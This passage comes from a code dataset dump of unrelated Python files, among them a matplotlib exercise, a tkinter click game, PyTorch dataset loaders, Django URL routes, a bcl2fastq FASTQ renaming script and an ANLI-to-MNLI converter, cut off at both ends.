encoding=\"utf-8\")\n steer = msgpack.unpackb(multipart_msg[1], encoding=\"utf-8\")\n md = msgpack.unpackb(multipart_msg[2])\n cv_img = multipart_msg[3]\n cv_img = np.frombuffer(cv_img, dtype=md[b'dtype'])\n cv_img = cv_img.reshape(md[b'shape'])\n obs_dict = {\"img\":cv_img, \"lidar\":lidar, \"steer\":steer}\n return obs_dict\n return _deser\n\n\ndef batch_callback(exp_path, obs_array):\n \"\"\"Takes the deserialized obs_array and performs simple training operations on it\"\"\"\n online_learner = Online()\n vis = Metric_Visualizer()\n pkl_name = online_learner.save_obsarray_to_pickle(obs_array, os.path.join(exp_path, 'raw'))\n vis.vid_from_pklpath(os.path.join(exp_path, 'proc', pkl_name), 0, 0, show_steer=True, units='rad', live=True)\n trainer = Trainer(online=True, pklpath=os.path.join(exp_path, 'proc', pkl_name), train_id=0)\n #Send model back\n modelpath = trainer.get_model_path()\n with open(modelpath, 'rb') as binary_file:\n model_dump = bytes(binary_file.read())\n return model_dump\n\ndef get_exp_path():\n exp_path = os.path.join(session[\"params\"][\"abs_path\"], session[\"params\"][\"sess_root\"], str(session[\"online\"][\"sess_id\"]), \"exp\")\n if not os.path.exists(exp_path):\n os.makedirs(exp_path)\n funclist = session[\"online\"][\"funclist\"]\n print(\"EXPERIENCE PATH:\", exp_path)\n return exp_path\n\nexp_path = get_exp_path()\ncb = partial(batch_callback, exp_path)\nserv = ExperienceServer(cb, deserialize_obs(), 4)\nserv.start()\nserv.join()\n","sub_path":"src/f110_gym/algorithms/simple_serv.py","file_name":"simple_serv.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"168667019","text":"# module 2 exercise: matplotlib.pyplot\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# 1. line plot\n\n# a. given these 2 data sets of totally fictitious enrollment numbers\nnumStudents41B = [0,0,1,1,1,3,5,9,12,12,12,12,10,15,16,18,20,17,17,17,18,19,20,21,21,23,23,20,22,22]\nnumStudents41A = [0,1,1,2,2,2,4,4,4,4,4,8,12,12,12,12,14,14,14,12,12,12,15,15,15,16,16,15,16,18]\n# b. create an np array for the number of days in 1 month: 1-31\ndays = np.arange(1,31)\n\n'''\n# c. plot the data\nplt.plot(days, numStudents41B) # which data is on the x-axis?\nplt.plot(days, numStudents41A) # which data is on the y-axis?\nplt.show()\n'''\n\n'''\n# add axis labels, legend, title to explain the graph,\n# and add new markers to show where the actual data is on the line plot\nplt.xlabel(\"days\")\nplt.ylabel(\"num of students\") # \n #\nplt.plot(days, numStudents41B, \n days, numStudents41B, 'ob', label=\"41B\")\nplt.plot(days, numStudents41A,\n days, numStudents41A, 'og', label=\"41A\")\nplt.legend(loc=\"best\") # \nplt.title(\"class registration\") # \nplt.show()\n'''\n\n'''\n# modify axes range to center the data\nplt.xlabel(\"days\")\nplt.ylabel(\"num of students\") \nplt.plot(days, numStudents41B, \n days, numStudents41B,'or',\n days, numStudents41A, \n days, numStudents41A,'ob') # \nplt.axis((-5, 35, -5, 30)) # \nplt.title(\"class registration\") # show title of graph\nplt.show()\n'''\n\n'''\n# set the x axis ticks and label them\nplt.xlabel(\"days\")\nplt.ylabel(\"num of students\")\nplt.plot(days, numStudents41B, \n days, numStudents41B, 'or', label=\"41B\")\nplt.plot(days, numStudents41A,\n days, numStudents41A, 'og', label=\"41A\") \nplt.axis((0, 30, 0, 30)) # \nplt.xticks((3,7,15), ('priority1', 'priority2', 'priority3')) # \nplt.legend(loc=\"best\") \nplt.title(\"class registration\") \nplt.show()\n'''\n\n\n\n# 2. histogram \n\n# plot frequency distribution of 20 random integers\nnumbers1 = np.random.randint(0,100, size = 20)\nnumbers2 = np.random.randint(0,100, size = 20)\nprint(sorted(numbers1))\nprint(sorted(numbers2))\n\nplt.title(\"random integers\")\nplt.xlabel(\"values\")\nplt.ylabel(\"frequency\")\n\n\n\n'''\n# basic plotting of numbers1\nplt.hist(numbers1, bins=20, color=\"orange\")\n'''\n\n'''\n# show the bins more clearly for numbers1\nplt.xticks(np.arange(0,101,5))\nplt.hist(numbers1, bins=20, color=\"orange\")\nplt.axis((0,100, 0, 4))\n'''\n\n\n# plotting both numbers1 and numbers2\nplt.hist(numbers1, bins=20, color=\"blue\", label=\"numbers1\", alpha = .5)\nplt.hist(numbers2, bins=20, color=\"red\", label=\"numbers2\", alpha = .5)\nplt.legend(loc=\"best\")\n\n\n'''\n# another way of plotting numbers1 and numbers2\nplt.hist((numbers1, numbers2), color=(\"blue\", \"red\"), label=(\"numbers1\",\"numbers2\"), alpha=0.5, bins=10)\nplt.legend(loc=\"best\")\n'''\nplt.show()\n","sub_path":"Module 2/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"71351372","text":"import tkinter as tk\nfrom random import randint\nfrom tkinter import messagebox\n\nroot = tk.Tk()\nroot.geometry('1000x800')\nroot.title('Mini-game')\nroot.resizable(0, 0)\n\n\n\ndef hand(event, ball):\n global count\n global t\n global score\n if count >= 10 and t < 1000:\n count = 0\n t += 1000\n if (event.x < ball.x + ball.r and event.x > ball.x - ball.r and event.y < ball.y + ball.r and event.y > ball.y - ball.r) :\n area.delete(ball.id_ball)\n balls.remove(ball)\n count +=1\n score += 1\n lbl.configure(text = str(score))\n\nclass Ball:\n global area\n id_ball, x, y, r, dx, dy = 0, 0, 0, 0, 0, 0\n def __init__(self):\n self.r = randint(25, 100)\n self.x = randint(1 + self.r, 1000 - self.r)\n self.y = randint(1 + self.r, 800 - self.r)\n self.dx = 5\n self.dy = 5\n self.id_ball = 0\n area.bind('', lambda event, b = self: hand(event, b))\n \n def show_on_canvas(self):\n self.id_ball = area.create_oval(self.x - self.r, self.y - self.r, self.x + self.r, self.y + self.r, fill = 'orchid3', outline = 'black')\n\n\n\n\ndef tick():\n global balls\n global area\n global t\n global score\n\n if score < -50:\n ans = messagebox.askyesno(\"You lose\", \"Restart?\")\n if ans == False:\n exit()\n else:\n score = 0\n t = 2000\n area.delete(balls[0].id_ball)\n balls = []\n \n if score >= 100:\n ans = messagebox.askyesno(\"You win\", \"Restart?\")\n if ans == False:\n exit()\n else:\n score = 0\n t = 2000\n area.delete(balls[0].id_ball)\n balls = []\n\n \n\n if t > 500:\n t -= 100\n i = 0\n for x in balls:\n area.delete(x.id_ball)\n balls.remove(x)\n i += 1\n \n if i > 0:\n score -= 10\n lbl.configure(text = str(score))\n x = Ball()\n x.show_on_canvas()\n balls += [x]\n area.after(t, tick)\n\n\ndef main():\n global area\n global lbl\n global score\n score = 0\n area = tk.Canvas(root, bg = 'bisque')\n area.pack(expand = True, fill = tk.BOTH)\n \n global balls\n \n global t\n t = 2000\n\n global count\n count = 0\n \n balls = []\n\n lbl = tk.Label(root, text = '0')\n lbl.place(x = 5, y = 5)\n\n tick()\n\n root.mainloop()\n\nmain()\n","sub_path":"class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"220000453","text":"from torch.utils.data import Dataset, DataLoader\nimport pandas as pd\nimport torch\nimport numpy as np\n\n#----------------------- Custom dataset classes ----------------------\n\n\nclass My_Dataset(Dataset): # loads the UCI regression CCPP\n\n\n def split_data(self,dataset):\n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n\n train_dataset, test_dataset = torch.utils.data.random_split(dataset, [train_size, test_size])\n train_dataset = torch.Tensor(train_dataset)\n test_dataset = torch.Tensor(test_dataset)\n return train_dataset, test_dataset\n \n def __len__(self): # len(dataset)\n return self.data[0,:].size\n def __getitem__(self, x): #dataset[i]\n return self.data[:,x]\n def get_xy(self, samples):\n x = samples[:,:self.input_dim]\n y = samples[:,self.input_dim]\n return x,y\n \n def normalize(self,data):\n\n for i in range(data[0,:].size):\n m = max(abs(data[:,i]))\n data[:,i] /= m\n return data\n \n \nclass VoltDataset(My_Dataset): # loads the UCI regression CCPP\n\n def __init__(self,normalize_bool = True): # init\n self.data = pd.read_excel('CCPP/CCPP/Folds5x2_pp.xlsx').values #('AirQualityUCI/AirQualityUCI.xlsx')\n torch.set_default_tensor_type('torch.DoubleTensor')\n #self.data = np.transpose(frame.values)\n self.input_dim = len(self.data[0]) -1 # - label\n self.output_dim = 1\n if (normalize_bool):\n self.data = self.normalize(self.data)\n self.train_data, self.test_data = self.split_data(self.data)\n\nclass AbaloneDataset(My_Dataset): # loads the UCI regression CCPP\n\n def __init__(self,normalize_bool = True): # init\n self.data = pd.read_csv('CCPP/abalone_data.csv').values #('AirQualityUCI/AirQualityUCI.xlsx')\n #Load the data from the CSV file\n males = (self.data[:,0] == 'M').astype(int)\n females = (self.data[:,0] == 'F').astype(int)\n self.data[:,0] = males - females\n\n torch.set_default_tensor_type('torch.DoubleTensor')\n self.input_dim = len(self.data[0]) -1 # - label\n self.output_dim = 1\n if (normalize_bool):\n self.data = self.normalize(self.data)\n self.train_data, self.test_data = self.split_data(self.data)\n\n\n\n\n \n","sub_path":"xWx_Regression/Load_Data_backup.py","file_name":"Load_Data_backup.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"423666519","text":"#!/usr/bin/env python\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on\n# an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\nimport os\nimport json\nimport argparse\nfrom beacons_bio_3d.utils import JSONUtils, DjangoUtils\n\n__doc__ = \"\"\"\n3D Beacons\n\nRegistry schema validation and utilities.\n\"\"\"\n\nRES_PATH = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'resources')\nDEFAULT_SCHEMA_JSON = f\"{RES_PATH}/schema.json\"\nDEFAULT_REGISTRY_JSON = f\"{RES_PATH}/registry.json\"\n\n\ndef main():\n \"\"\" This is the application entry point\n \"\"\"\n\n parser = argparse.ArgumentParser(\n description=__doc__, formatter_class=argparse.RawTextHelpFormatter)\n sub_parsers = parser.add_subparsers(dest='subparser_name', help=\"Available sub-commands\")\n\n # parser for validation functions\n validate_parser = sub_parsers.add_parser(\"validate_schema\", help=\"Validates the registry JSON with the defined schema.\")\n validate_parser.add_argument(\"--schema_json\", help=\"Path to the schema JSON\", required=True)\n validate_parser.add_argument(\"--registry_json\", help=\"Path to the registry JSON\", required=True)\n\n # parser for model generation functions\n model_gen_parser = sub_parsers.add_parser(\"model_generate\", help=\"Generates model JSON from registry JSON.\")\n model_gen_parser.add_argument(\"--registry_json\", help=\"Path to registry JSON to be converted\", required=True)\n model_gen_parser.add_argument(\"--model_json\", help=\"Path to output model JSON\", required=True)\n model_gen_parser.add_argument(\n \"--django_app\",\n help=\"The name of Django app, this will be used to define package for model\",\n default=\"core\")\n\n args = parser.parse_args()\n\n if args.subparser_name == \"validate_schema\":\n JSONUtils.validate_schema(args.schema_json, args.registry_json)\n elif args.subparser_name == \"model_generate\":\n if JSONUtils.validate_schema(DEFAULT_SCHEMA_JSON, args.registry_json):\n # generate model json\n gen_model = DjangoUtils.generate_fixture_json(args.registry_json, django_app=args.django_app)\n with open(args.model_json, \"w\") as model_json_handle:\n json.dump(gen_model, model_json_handle)\n\n print(f\"Model JSON generated to {args.model_json}\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"beacons_bio_3d/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"369777498","text":"#--- Marketing Tool - Imported Packages List ----\r\n\r\n#------Django Internal Packages-----\r\nfrom django.urls import include, path,re_path\r\nfrom django.contrib.auth import views as auth_views\r\n#<------Django Internal Packages-----\r\n\r\n#------ Marketing Tool Importing Project Files -----\r\n#Marketing Tool - Our Application Views\r\nfrom marketing_tool_lead_manager_app import views\r\n\r\n#////',views.leads_locationfrom_locationto_logintime_logouttime,name='leads_locationfrom_locationto_logintime_logouttime'),\r\n\r\n#Marketing Tool - Leads Details based on Location From, Location To, Login Time and Logout Time (Data Table)\r\npath('leads/detail/////',views.leads_locationfrom_locationto_logintime_logouttime_dt,name='leads_locationfrom_locationto_logintime_logouttime_dt'),\r\n\r\n\r\n\r\n#', views.LeadReadView.as_view(), name='read_lead'),\r\n\r\n#Marketing Tool - update url\r\npath('update/', views.LeadUpdateView.as_view(), name='update_lead'),\r\n\r\n#Marketing Tool - delete url\r\npath('delete/', views.LeadDeleteView.as_view(), name='delete_lead'),\r\n\r\n#Marketing Tool - location update\r\npath('update/location/', views.LocationUpdateView.as_view(), name='update_location'),\r\n\r\n\r\n#', views.leads_status_details.as_view(), name='leads_status_details'),\r\n\r\n\r\n#<------ Marketing Tool Zing Grid Test -----\r\n#path('lead_zing_grid_list',views.lead_zing_grid_list,name='lead_zing_grid_list'),\r\n\r\n#path('lead_zing_grid_list_mumbai',views.lead_zing_grid_list_mumbai,name='lead_zing_grid_list_mumbai'),\r\n\r\n#path('routes_zing_grid_list',views.routes_zing_grid_list,name='routes_zing_grid_list'),\t\r\n\r\n#path('leads_api/details/////', views.leads_api_Details.as_view()),\r\n\r\n\r\n\r\n#<------ Marketing Tool B2B Company Leads Urls -----\r\n\r\n#Marketing Tool - Company Leads base \r\npath(\"company_lead_base\", views.company_lead_base, name=\"company_lead_form\"),\r\n\r\n\r\n#Marketing Tool - Company Leads Form \r\npath(\"company/form\", views.company_lead_form, name=\"company_lead_form\"),\r\n\r\n#Marketing Tool - Company Leads Data\r\npath(\"company/leads\", views.company_lead_data, name=\"company_lead_data\"),\r\n\r\n#Marketing Tool - Company Leads Report \r\npath(\"company/reports\", views.company_lead_report, name=\"company_lead_report\"),\r\n\r\n#Marketing Tool - Company Leads Report \r\npath(\"company_lead_form_submit\", views.company_lead_form_submit, name=\"company_lead_form_submit\"),\r\n#\", views.view_leads, name=\"view_leads\"),\r\n\r\npath(\"add_new_lead_status/\",views.add_new_lead_status, name='add_new_lead_status'),\r\n\r\npath('updatelead/',views.updatelead.as_view(),name='updatelead'),\r\n\r\npath('deletelead/',views.deletelead.as_view(),name='deletelead'),\r\n\r\npath('update_login_time/', views.update_login_time.as_view(), name='update_login_time'),\r\n\r\npath('update_logout_time/', views.update_logout_time.as_view(), name='update_logout_time'),\r\n\r\npath('update_login_time/', views.update_login_time.as_view(), name='update_login_time'),\r\n\r\npath('delete_login_time/', views.delete_login_time.as_view(), name='delete_login_time'),\r\n\r\npath('delete_logout_time/', views.delete_logout_time.as_view(), name='delete_logout_time'),\r\n\r\npath('delete_pickup/', views.delete_pickup.as_view(), name='delete_pickup'),\r\n\r\npath('delete_drop/', views.delete_drop.as_view(), name='delete_drop'),\r\n\r\npath('Add_pickup/', views.Add_pickup.as_view(), name='Add_pickup'),\r\n\r\npath('Add_drop/', views.Add_drop.as_view(), name='Add_drop'),\r\n\r\npath('Add_login/', views.Add_login.as_view(), name='Add_login'),\r\n\r\npath('Add_logout/', views.Add_logout.as_view(), name='Add_logout'),\r\n\r\npath('Add_new_user/', views.Add_new_user.as_view(), name='Add_new_user'),\r\n\r\npath('update_user/', views.update_user.as_view(), name='update_user'),\r\n\r\npath('delete_user/', views.delete_user.as_view(), name='delete_user'),\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n]","sub_path":"marketing_tool_lead_manager_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":8187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105072155","text":"#!/usr/bin/env python3\n\n\"\"\" \"Fixes\" the output of bcl2fastq to meet our requirements.\n Files are renamed, grouped by pool, and shifted out of the demultiplexing directory.\n projects_ready.txt is added listing the projects found\n projects_pending.txt is deleted if it exists\n\"\"\"\n# I guess we could go back to keeping the files in /ifs/runqc until they are renamed,\n# and this might be sensible for backup purposes. In any case I could do this with a\n# symlink so the code can stay the same.\n\nimport os, sys, re, time\nfrom glob import glob\nimport yaml\n\nfrom collections import namedtuple\nfrom contextlib import suppress\n\n# Global error collector\nERRORS = set()\n\ndef main(output_dir, prefix=None):\n \"\"\" Usage BCL2FASTQPostprocessor.py [prefix]\n \"\"\"\n output_dir = os.path.abspath(output_dir)\n\n #The prefix is normally the run name ie. the folder name, but driver.sh\n #will set this explicitly based on RunInfo.\n if not prefix:\n prefix = os.path.basename(output_dir)\n\n #All renames need to be logged. The log wants to live in the demultiplexing/\n #subdirectory.\n demux_dir = output_dir + \"/demultiplexing\"\n with open(os.path.join(demux_dir, 'renames.log'), 'a') as log_fh:\n def log(m): print(m, file=log_fh)\n log(\"# %s\" % sys.argv[0])\n log(\"# renaming files in %s on %s\" % (\n demux_dir,\n time.strftime('%Y-%m-%d %H:%M', time.localtime()) ))\n\n project_seen = do_renames(output_dir, prefix, log=log)\n\n if ERRORS:\n log(\"# There were errors...\")\n for e in ERRORS:\n print(\"Error: %s\" % e)\n log(\"# %s\" % e)\n else:\n save_projects_ready(output_dir, project_seen)\n log(\"# DONE. And projects_ready.txt was saved out.\")\n\n\ndef save_projects_ready(output_dir, proj_seen):\n \"\"\"Save out what we've processed. There might be stuff already in projects_ready.txt\n and we want to maintain the contents as a sorted set (as per 'sort -u')\n \"\"\"\n proj_ready_file = os.path.join(output_dir, 'projects_ready.txt')\n with suppress(FileNotFoundError):\n with open(proj_ready_file) as pr_fh:\n for l in pr_fh:\n proj_seen.add(l.strip())\n\n with open(proj_ready_file, 'w') as pr_fh:\n for p in sorted(proj_seen):\n # Only add projects for which there is a directory. This catches the\n # case where a incorrect project name was in the sample sheet and\n # the files have been completely flushed on re-do.\n if os.path.isdir(os.path.join(output_dir,p)):\n print(p, file=pr_fh)\n\n # And delete projects_pending.txt. It probably doesn't exist, which is fine.\n with suppress(FileNotFoundError):\n os.unlink(os.path.join(output_dir, 'projects_pending.txt'))\n\ndef check_project_name(proj_name):\n \"\"\" BCL2FASTQ is already quite fussy about project names.\n This will just chack that the project name isn't going to clobber any\n of our folders.\n \"\"\"\n if \".\" in proj_name:\n raise ValueError(\"Invalid project name {!r} contains a period.\".format(proj_name))\n\n if proj_name in \"counts demultiplexing md5sums multiqc_reports QC seqdata slurm_output\".split():\n raise ValueError(\"Invalid project name {!r} conflicts with reserved names.\".format(proj_name))\n\ndef do_renames(output_dir, runid, log = lambda m: print(m)):\n \"\"\" The main part of the code that does the renaming (moving).\n Primary reason for splitting this out from main() is to separate\n the sys.argv processing and the log file handling in order to\n simplify unit testing.\n Returns the list of projects for which files have been renamed.\n \"\"\"\n proj_seen = set()\n\n def add_project(proj_name):\n check_project_name(proj_name)\n proj_seen.add(proj_name)\n\n # Previously we scanned for *.fastq.gz files, but it's more sensible to look for an explicit\n # list of projects. The projects don't get listed in Stats.json, so go back to sample_summary.yml\n # directly. This allows us to proceed even when no files were produced (ie. all the barcodes are wrong)\n try:\n with open( os.path.join( output_dir, \"seqdata/pipeline\" , \"sample_summary.yml\" ) ) as sfh:\n summary = yaml.safe_load(sfh)\n for proj in summary['ProjectInfo']:\n add_project(proj)\n\n # Now we can't add any new projects.\n def add_project(proj_name):\n assert proj_name in proj_seen\n except FileNotFoundError:\n log(\"Failed to read seqdata/pipeline/sample_summary.yml. Proceeding anyway.\")\n\n # Some funny-business with UMI reads. These come out as read 2 but we actually want to rename them\n # to _UMI and rename the _3 read as _2. For this reason, gather up the file list first.\n afile = namedtuple(\"afile\", \"samplename lane readnumber project pool_and_library\".split())\n all_fastq = set()\n afile_to_filename = dict()\n\n def translate_read_number(f, set_of_f):\n if f.readnumber == \"2\":\n # If we are dealing with UMI's we'll see a corresponding read3\n if f._replace(readnumber=\"3\") in set_of_f:\n return \"UMI\"\n elif f.readnumber == \"3\":\n assert f._replace(readnumber=\"2\") in set_of_f\n return \"2\"\n return f.readnumber\n\n # Notwithstanding the list of projects obtained by the summary, look for fastq.gz files in all\n # locations.\n # Either we have a list of projects and will find corresponding fastq, or else we have no list and\n # will make it up as we go along.\n for fastq_file in glob(os.path.join( output_dir, \"demultiplexing/lane*\" , \"*/*/*.fastq.gz\" )):\n\n #os.path.split is unhelpful here. Just do it the obvious way.\n # something like: 10528, 10528EJ0019L01, 10528EJpool03_S19_L005_R1_001.fastq.gz\n lane_dir, project, pool_and_library, filename = fastq_file.split('/')[-4:]\n\n #Note the project as one we've processed.\n add_project(project)\n\n # get information from the filename\n re_match = re.match( r'(.*)_(S[0-9]+)_L00(\\d)_R(\\d)_\\d+.fastq.gz', filename, re.I)\n\n if not re_match:\n log(\"# skipping (regex mismatch) %s\" % fastq_file)\n continue\n samplename = re_match.group(1) # e.g.: We ignore this!\n lane = re_match.group(3) # e.g.: L00(5)\n readnumber = re_match.group(4) # e.g.: R(1)\n\n # Check lane matches the directory name\n if not lane_dir == 'lane{}'.format(lane):\n log(\"# skipping (lane mismatch) %s\" % fastq_file)\n continue\n\n # Add this to the collection\n thisfile = afile( samplename = samplename,\n lane = lane,\n readnumber = readnumber,\n project = project,\n pool_and_library = pool_and_library )\n all_fastq.add(thisfile)\n afile_to_filename[thisfile] = fastq_file\n\n # Now go again for files not in a subdirectory (if Sample_Name was blank)\n # (apologies for the copy-paste)\n for fastq_file in glob(os.path.join( output_dir, \"demultiplexing/lane*\" , \"*/*.fastq.gz\" )):\n\n #os.path.split is unhelpful here. Just do it the obvious way.\n # something like: 10528, 10528EJ0019L01, 10528EJpool03_S19_L005_R1_001.fastq.gz\n lane_dir, project, filename = fastq_file.split('/')[-3:]\n\n #Note the project as one we've processed.\n add_project(project)\n\n # get information from the filename\n # Note this ignores index reads.\n re_match = re.match( r'(.*)_(S[0-9]+)_L00(\\d)_R(\\d)_\\d+.fastq.gz', filename, re.I)\n\n if not re_match:\n log(\"# skipping (regex mismatch) %s\" % fastq_file)\n continue\n pool_and_library = re_match.group(1) # e.g.: 10528EJpool03__10528EJ0019L01\n lane = re_match.group(3) # e.g.: L00(5)\n readnumber = re_match.group(4) # e.g.: R(1)\n\n # Check lane matches the directory name\n if not lane_dir == 'lane{}'.format(lane):\n log(\"# skipping (lane mismatch) %s\" % fastq_file)\n continue\n\n # Add this to the collection\n thisfile = afile( samplename = '',\n lane = lane,\n readnumber = readnumber,\n project = project,\n pool_and_library = pool_and_library )\n all_fastq.add(thisfile)\n afile_to_filename[thisfile] = fastq_file\n\n\n for f in all_fastq:\n fastq_file = afile_to_filename[f]\n readnumber = translate_read_number(f, all_fastq)\n\n # split out library and pool\n try:\n pool, library = f.pool_and_library.split('__')\n except ValueError:\n #log(\"# skipping (no pool__library) %s\" % fastq_file)\n #continue\n # Decided be a little less strict here. This is also needed for PhiX\n pool = 'NoPool'\n library = pool_and_library\n\n\n new_filename = \"{runid}_{f.lane}_{library}_{readnumber}.fastq.gz\".format(**locals())\n new_filename_relative = os.path.join ( f.project, pool, new_filename )\n new_filename_absolute = os.path.join ( output_dir, new_filename_relative )\n\n #Make the directory to put it in\n os.makedirs(os.path.dirname(new_filename_absolute), exist_ok=True)\n\n #Paranoia. Rather than checking if the file exists, create it exclusively.\n #That way, no possible race condition that can cause one file to be renamed over\n #another file (ignoring remote NFS race conditions).\n try:\n log( \"mv %s %s\" % ('/'.join(fastq_file.split('/')[-4:]), new_filename_relative) )\n\n with open(new_filename_absolute, 'x') as tmp_fd:\n os.replace(fastq_file, new_filename_absolute)\n except FileExistsError:\n log(\"# FileExistsError renaming %s\" % new_filename_relative)\n raise\n\n\n # Now deal with the undetermined files.\n undet_fastq = set()\n for undet_file_absolute in glob(os.path.join( output_dir, \"demultiplexing/lane*\", \"[Uu]ndetermined_*\" )):\n lane_dir, filename = undet_file_absolute.split('/')[-2:]\n\n # eg. Undetermined_S0_L004_R1_001.fastq.gz\n re_match = re.match( r'undetermined_(.*)_L00(\\d)_R(\\d)_\\d+.fastq.gz', filename, re.I)\n\n if not re_match:\n log(\"# skipping %s\" % fastq_file)\n continue\n\n lane = re_match.group(2)\n readnumber = re_match.group(3)\n\n # Check lane matches the directory name\n if not lane_dir == 'lane{}'.format(lane):\n log(\"# skipping (lane mismatch) %s\" % fastq_file)\n continue\n\n # Add this to the collection\n thisfile = afile( samplename = 'undetermined',\n lane = lane,\n readnumber = readnumber,\n project = '',\n pool_and_library = '' )\n undet_fastq.add(thisfile)\n afile_to_filename[thisfile] = undet_file_absolute\n\n # And process the set we just collected\n for f in undet_fastq:\n fastq_file = afile_to_filename[f]\n readnumber = translate_read_number(f, undet_fastq)\n\n # eg. 160811_D00261_0355_BC9DA7ANXX_4_unassigned_1.fastq.gz\n new_filename = \"{runid}_{f.lane}_unassigned_{readnumber}.fastq.gz\".format(**locals())\n\n new_filename_absolute = os.path.join ( output_dir, new_filename )\n\n #See comment above\n try:\n log( \"mv %s %s\" % ( os.path.join(\"demultiplexing\", filename), new_filename) )\n\n with open(new_filename_absolute, 'x') as tmp_fd:\n os.rename(fastq_file, new_filename_absolute)\n except FileExistsError:\n log(\"# FileExistsError renaming %s\" % new_filename)\n raise\n\n # Cleanup empty project directories (as per Cleanup.py) then warn if any dirs\n # remain (or, if fact, that's an error).\n for lane_dir in glob(os.path.join(output_dir, \"demultiplexing\", \"lane*\")):\n for proj in list(proj_seen):\n for root, dirs, files in os.walk(\n os.path.join(lane_dir, proj),\n topdown=False ):\n try:\n os.rmdir(root)\n log(\"rmdir '%s'\" % root)\n except Exception:\n # Assume it was non-empty.\n ERRORS.add(\"Failed to remove all project directories from demultiplexing area.\")\n log(\"# could not remove dir '%s'\" % root)\n # And we cannot say the project is ready.\n proj_seen.discard(proj)\n\n # Finally return the projects processed\n return proj_seen\n\nif __name__ == '__main__':\n print(\"Running: \" + ' '.join(sys.argv))\n main(*sys.argv[1:])\n if ERRORS: exit(1)\n","sub_path":"BCL2FASTQPostprocessor.py","file_name":"BCL2FASTQPostprocessor.py","file_ext":"py","file_size_in_byte":12988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"171833261","text":"file = input(\"Enter name of file(including '.txt' extension): \")\r\nwith open(file,'rt') as f:\r\n data = f.readlines()\r\nwords = []\r\nfor line in data:\r\n for word in line.split():\r\n words.append(word)\r\nfreq_map = {}\r\nfor i in words:\r\n if i in freq_map:\r\n freq_map[i] += 1\r\n else:\r\n freq_map[i] = 1\r\n\r\nfor word in freq_map:\r\n print(f\"'{word}' - {freq_map[word]} times\")\r\n","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109399177","text":"from django.urls import path\n\nfrom . import views\n# from .views import AttendanceRequestCreateView\nurlpatterns = [\n path('', views.all_requests, name='all_requests'),\n path('new_request/', views.create_requuest, name='new_request'),\n path('cr_requests/',views.cr_requests, name='cr_requests'),\n path('amc_requests/',views.amc_requests, name='amc_requests'),\n path('verify_accept/',views.verify_accept, name='verify_accept'),\n path('verify_reject/',views.verify_reject, name='verify_reject'),\n path('/details/', views.request_detail, name='request_detail'),\n]","sub_path":"attendance_request/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"405783809","text":"import nli\nimport os\nimport pandas as pd\nimport random\nimport json\n\nDATA_HOME = os.path.join(\"data\", \"nlidata\")\n\nSNLI_HOME = os.path.join(DATA_HOME, \"snli_1.0\")\n\nMULTINLI_HOME = os.path.join(DATA_HOME, \"multinli_1.0\")\n\nANNOTATIONS_HOME = os.path.join(DATA_HOME, \"multinli_1.0_annotations\")\n\nANLI_HOME = os.path.join(DATA_HOME, \"anli_v0.1\")\n\n###################################################################\n# ANLI Round 1 data only\ndef label_anli2mmnli(label):\n if label == \"c\":\n return \"contradiction\"\n elif label == \"e\":\n return \"entailment\"\n elif label == \"n\":\n return \"neutral\"\n else:\n raise IndexError\n\nanli2mnli_round1_dev_jsonl_format = []\n\nfor ex in nli.ANLIDevReader(ANLI_HOME, rounds=(1,)).read():\n jsonl_format = {\n 'annotator_labels': [],\n 'genre': 'slate',\n 'gold_label': label_anli2mmnli(ex.label),\n 'pairID': ex.uid,\n 'promptID': None,\n 'sentence1': ex.context.rstrip(),\n 'sentence1_binary_parse': None,\n 'sentence1_parse': None,\n 'sentence2': ex.hypothesis.rstrip(),\n 'sentence2_binary_parse': None,\n 'sentence2_parse': None\n }\n\n anli2mnli_round1_dev_jsonl_format.append(jsonl_format)\n\nwith open(r'C:\\_hackerreborn\\cs224u\\anli2mnli_round1\\dev_matched.jsonl', 'w', encoding='utf-8') as f:\n for item in anli2mnli_round1_dev_jsonl_format:\n s = json.dumps(item)\n f.write(s + \"\\n\")\n\nwith open(r'C:\\_hackerreborn\\cs224u\\anli2mnli_round1\\dev_matched.tsv', 'w', encoding='utf-8') as f:\n f.write(\"index\tpromptID\tpairID\tgenre\tsentence1_binary_parse\tsentence2_binary_parse\tsentence1_parse\tsentence2_parse\tsentence1\tsentence2\tlabel1\tlabel2\tlabel3\tlabel4\tlabel5\tgold_label\" + \"\\n\")\n for i, item in enumerate(anli2mnli_round1_dev_jsonl_format):\n s = 